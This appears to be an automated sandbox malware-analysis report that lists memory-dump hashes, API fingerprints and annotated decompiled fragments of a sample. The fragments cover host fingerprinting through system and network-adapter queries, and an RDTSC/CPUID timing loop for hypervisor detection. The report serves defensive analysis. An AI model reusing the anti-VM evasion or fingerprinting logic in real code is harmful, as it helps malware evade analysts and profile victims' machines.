Instruction addresses for the statements above (collapsed from the report's per-line address column): function entry at 0x001b2434, statements mapped through 0x001b2528; entries of 0x00000000 mark lines with no instruction address.

APIs
Memory Dump Source
• Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
• Instruction ID: c9da4ff87a2bc895bab384596edc4cc2c37c45b21341cafe2a5a99aac0f3a436
• Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
• Instruction Fuzzy Hash: F0219272300A409AEF20EFB2E4543ED33A1F798784F994426EE4D57659EF38D549C350
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2109279463.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2109273690.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2109287583.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2109296756.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2109302082.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: AllocVirtual
• String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
• API String ID: 4275171209-1517691801
• Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
• Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
• Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
• Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2109279463.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2109273690.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2109287583.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2109296756.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2109302082.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
• String ID: DllRegisterServer$G$_
• API String ID: 1174013218-1650116920
• Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
• Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
• Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
• Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2109279463.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2109273690.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2109287583.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2109296756.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2109302082.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: AllocVirtual
• String ID: @
• API String ID: 4275171209-2766056989
• Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
• Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
• Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
• Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
Similarity
• API ID: ExitProcessSleepUser
• String ID:
• API String ID: 354099737-0
• Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
• Instruction ID: b248c92643af6e86a2ba2c5abe2b16d8dab0787f217852e1677af44787d65faf
• Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
• Instruction Fuzzy Hash: 03C08C30104684D3F31EBB20E8683E93235B300305F424619E303856E08F3C04C8C303
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2109279463.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2109273690.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2109287583.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2109296756.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2109302082.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
• Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
• Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
• Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 44%
E001B2C08(void* __ecx, void* __edx, void* __edi, intOrPtr* __rax, long long __rbx, long long __rsi, long long __rbp, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
	void* _t22;
	int _t23;
	int _t24;
	void* _t30;
	void* _t36;
	intOrPtr* _t40;
	long long _t46;
	signed long long _t47;
	signed long long _t48;
	intOrPtr* _t68;
	long long _t70;

	_t40 = __rax;
	_t36 = __edi;
	_a8 = __rbx;
	_a16 = __rbp;
	_a24 = __rsi;
	_t70 = __r8;
	GetProcessHeap();
	r8d = 0x2001; // allocation size, third argument of RtlAllocateHeap (x64: r8)
	_t22 = RtlAllocateHeap(??, ??, ??); // executed
	_t68 = __rax;
	_t38 = __rax;
	if(__rax != 0) {
		// the two caller-supplied integers are formatted into the fresh buffer
		r9d = __ecx;
		_t23 = wsprintfW(??, ??);
		r9d = __edx;
		_t24 = wsprintfW(??, ??);
		r9d = E001B2BD8(_t24, __rax, L"%s%u");
		_t46 = _t23 + _t24 + wsprintfW(??, ??);
		// subcall 001B1678 wraps NtQuerySystemInformation (see APIs below)
		r9d = E001B1678(__rax, _t46, __r8);
		_t47 = _t46 + wsprintfW(??, ??);
		E001B1D18(__rax, _t47, __rax + _t47 * 2, _t70);
		_t48 = _t47 + __rax;
		// offsets are doubled because the buffer holds wide (UTF-16) characters
		_t30 = E001B1AC8(_t38, __rax, _t48, __rax + _t48 * 2, ":");
		_t49 = _t48 + __rax;
		E001B2A98(_t30, _t36, __rax, _t48 + __rax, __rax + (_t48 + __rax) * 2, _t70, _t70);
		// subcall 001B27BC wraps GetAdaptersInfo (see APIs below)
		_t22 = E001B27BC(_t49 + _t40, _t68 + (_t49 + _t40) * 2, _t70, ":");
	}
	return _t22;
}
Disassembly addresses (instruction text not preserved in this listing): 0x001b2c08 0x001b2c0d 0x001b2c12 0x001b2c1c 0x001b2c23 0x001b2c2e 0x001b2c37 0x001b2c3d 0x001b2c40 0x001b2c43 0x001b2c49 0x001b2c5d 0x001b2c66 0x001b2c7e 0x001b2c93 0x001b2ca9 0x001b2cb5 0x001b2ccb 0x001b2cd2 0x001b2cd7 0x001b2cde 0x001b2ce3 0x001b2ced 0x001b2cf9 0x001b2cfe 0x001b2d15

APIs
• RtlAllocateHeap.NTDLL(?,?,00000003,001B24A4), ref: 001B2C37
  • Part of subcall function 001B1678: NtQuerySystemInformation.NTDLL(?,?,00000000,001B2CB1,?,?,00000003,001B24A4), ref: 001B16CB
  • Part of subcall function 001B27BC: GetAdaptersInfo.IPHLPAPI(?,?,00000000,001B2CFE,?,?,00000003,001B24A4), ref: 001B280F
  • Part of subcall function 001B27BC: GetAdaptersInfo.IPHLPAPI(?,?,00000000,001B2CFE,?,?,00000003,001B24A4), ref: 001B2845
Memory Dump Source
• Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
Similarity
• API ID: AdaptersInfo$AllocateHeapInformationQuerySystem
• String ID:
• API String ID: 1716770124-0
• Opcode ID: 551f92eabf4abe2fe4f6e692089831cc0b5c0ff75ee8c8a7613f42fc3d82b9ba
• Instruction ID: 79a8e36b197c05e4bfbffd8a43a072400a9706c1595671512c0785f21630dd0c
• Opcode Fuzzy Hash: 551f92eabf4abe2fe4f6e692089831cc0b5c0ff75ee8c8a7613f42fc3d82b9ba
• Instruction Fuzzy Hash: BB213972785B00A2DF10AB55F8943E87360FBA5B81F94852AEB0E87775EF38C569C300
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,001B1E13), ref: 001B264B
Memory Dump Source
• Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
Similarity
• API ID: InfoNativeSystem
• String ID:
• API String ID: 1721193555-0
• Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
• Instruction ID: 62c8b849bfd568ce1ef31c80dc291a9cddc16c83e20172e320ba1ef74a26f57a
• Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
• Instruction Fuzzy Hash: 3EE0ED3262454592EF11FB20E8543D97361FBD8704F844126A95E426A4EF3CCA5DC740
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
• Instruction ID: 8f3362570e4ab31714775b751fca0485858bf91516d18a81d9f787fbf53f0960
• Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
• Instruction Fuzzy Hash: 62D0A772E1424083F7309B10EA263DA3311F3D4315FD18206D54944554CF3CC158CA00
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2109279463.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109273690.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109287583.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109296756.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109302082.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID: %
                                                                                                                                                                                                                                                                      • API String ID: 0-2567322570
                                                                                                                                                                                                                                                                      • Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                                                      • Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2109279463.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109273690.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109287583.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109296756.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2109302082.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                      • Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                                                      • Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

C-Code - Quality: 74%
	/* Decompiled from the memory dump at 0x001b1e50. The loop below is the
	   RDTSC/CPUID timing measurement flagged in the report summary: it times
	   a CPUID instruction between two RDTSC reads and, on the next pass, times
	   back-to-back RDTSC reads, summing both over _t49 iterations so that the
	   ratio can be compared against a threshold to detect a hypervisor. */
	E001B1E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
		signed int _t18;
		signed long long _t31;
		signed long long _t34;
		signed long long _t41;
		signed long long _t42;
		signed long long _t43;
		signed long long _t44;
		void* _t45;
		signed long long _t47;
		long long _t49;
		void* _t51;
		void* _t52;

		_t47 = __rsi;
		_t41 = __rdx;
		_t31 = __rax;
		 *((long long*)(_t51 + 8)) = __rbx;
		 *((long long*)(_t51 + 0x10)) = _t49;
		 *((long long*)(_t51 + 0x18)) = __rsi;
		_push(_t45);
		_t52 = _t51 - 0x30;
		do {
			/* yield first so the measurement starts from a fresh time slice */
			SwitchToThread();
			asm("rdtsc");
			_t42 = _t41 << 0x20;
			/* CPUID is a VM exit on most hypervisors, so it costs far more cycles there */
			asm("cpuid");
			 *((intOrPtr*)(_t52 + 0x20)) = 1;
			 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
			 *((intOrPtr*)(_t52 + 0x28)) = 0;
			 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
			asm("rdtsc");
			_t43 = _t42 << 0x20;
			/* elapsed cycles for the CPUID window, accumulated in _t45 */
			_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
			_t45 = _t45 + _t34;
			_t18 = SwitchToThread();
			/* baseline: two RDTSC reads with nothing in between, accumulated in _t47 */
			asm("rdtsc");
			_t44 = _t43 << 0x20;
			asm("rdtsc");
			_t41 = _t44 << 0x20;
			_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
			_t47 = _t47 + _t31;
			_t49 = _t49 - 1;
		} while (_t49 != 0);
		return _t18 / _t47;
	}
                                                                                                                                                                                                                                                                      0x001b1ec1
                                                                                                                                                                                                                                                                      0x001b1ec4
                                                                                                                                                                                                                                                                      0x001b1ec7
                                                                                                                                                                                                                                                                      0x001b1ec7
                                                                                                                                                                                                                                                                      0x001b1ee9

Memory Dump Source
• Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
• Instruction ID: 80c998a9793ecc47e81bc9254404e8b3672f87213e98f697ae28350c03febed1
• Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
• Instruction Fuzzy Hash: 60019E72B28A908BDF248F26B600389B6A2E38D7C0F148535EB9C43B19DB3CD4958B04
Uniqueness

Uniqueness Score: -1.00%